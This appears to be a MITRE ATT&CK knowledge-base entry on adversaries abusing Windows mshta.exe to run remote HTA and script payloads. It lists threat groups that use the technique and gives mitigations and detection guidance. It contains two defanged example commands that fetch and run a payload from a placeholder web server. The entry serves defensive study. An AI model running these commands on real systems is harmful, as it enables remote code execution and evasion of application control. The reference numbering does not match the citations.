Signed Binary Proxy Execution: Mshta

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code [1] [2] [3] [4] [5]

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. [6] HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. [7]

Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))

They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta

Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. [8]

ID: T1218.005
Sub-technique of:  T1218
Tactic: Defense Evasion
Platforms: Windows
Permissions Required: User
Data Sources: Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation
Defense Bypassed: Application control, Digital Certificate Validation
Contributors: Ricardo Dias; Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
Version: 1.0
Created: 23 January 2020
Last Modified: 30 December 2020

Procedure Examples

ID Name Description
G0050 APT32

APT32 has used mshta.exe for code execution.[9][10]

S0414 BabyShark

BabyShark has used mshta.exe to download and execute applications from a remote server.[11]

G0046 FIN7

FIN7 has used mshta.exe to execute VBScript to execute malicious code on victim systems.[5]

G0100 Inception

Inception has used malicious HTA files to drop and execute malware.[12]

G0094 Kimsuky

Kimsuky has used mshta.exe to run malicious scripts on the system.[13][11][14]

S0250 Koadic

Koadic can use MSHTA to serve additional payloads.[15]

G0032 Lazarus Group

Lazarus Group has used mshta.exe to run malicious scripts and download programs.[16]

S0455 Metamorfo

Metamorfo has used mshta.exe to execute a HTA payload.[17]

G0069 MuddyWater

MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.[18][19]

G0129 Mustang Panda

Mustang Panda has used mshta.exe to launch collection scripts.[20]

S0228 NanHaiShu

NanHaiShu uses mshta.exe to load its program and files.[21]

S0223 POWERSTATS

POWERSTATS can use Mshta.exe to execute additional payloads on compromised hosts.[18]

S0379 Revenge RAT

Revenge RAT uses mshta.exe to run malicious scripts on the system.[22]

S0589 Sibot

Sibot has been executed via MSHTA application.[23]

G0121 Sidewinder

Sidewinder has used mshta.exe to execute malicious payloads.[24][25]

G0127 TA551

TA551 has used mshta.exe to execute malicious payloads.[26]

S0341 Xbash

Xbash can use mshta for executing scripts.[27]

Mitigations

ID Mitigation Description
M1042 Disable or Remove Feature or Program

Mshta.exe may not be necessary within a given environment since its functionality is tied to older versions of Internet Explorer that have reached end of life.

M1038 Execution Prevention

Use application control configured to block execution of mshta.exe if it is not required for a given system or network to prevent potential misuse by adversaries.

Detection

Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.

Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious

References

  1. Magius, J., et al. (2017, July 19). Koadic. Retrieved June 18, 2018.
  2. F-Secure Labs. (2020, August 18). Lazarus Group Campaign Targeting the Cryptocurrency Vertical. Retrieved September 1, 2020.
  3. Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020.
  4. Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.
  5. Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.
  6. Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021.
  7. F-Secure Labs. (2016, July). NANHAISHU RATing the South China Sea. Retrieved July 6, 2018.
  8. Gannon, M. (2019, February 11). With Upgrades in Delivery and Support Infrastructure, Revenge RAT Malware is a Bigger Threat. Retrieved May 1, 2019.
  9. Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021.
  10. Rewertz. (2020, April 20). Sidewinder APT Group Campaign Analysis. Retrieved January 29, 2021.
  11. Rewterz. (2020, June 22). Analysis on Sidewinder APT Group – COVID-19. Retrieved January 29, 2021.
  12. Duncan, B. (2021, January 7). TA551: Email Attack Campaign Switches from Valak to IcedID. Retrieved March 17, 2021.
  13. Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018.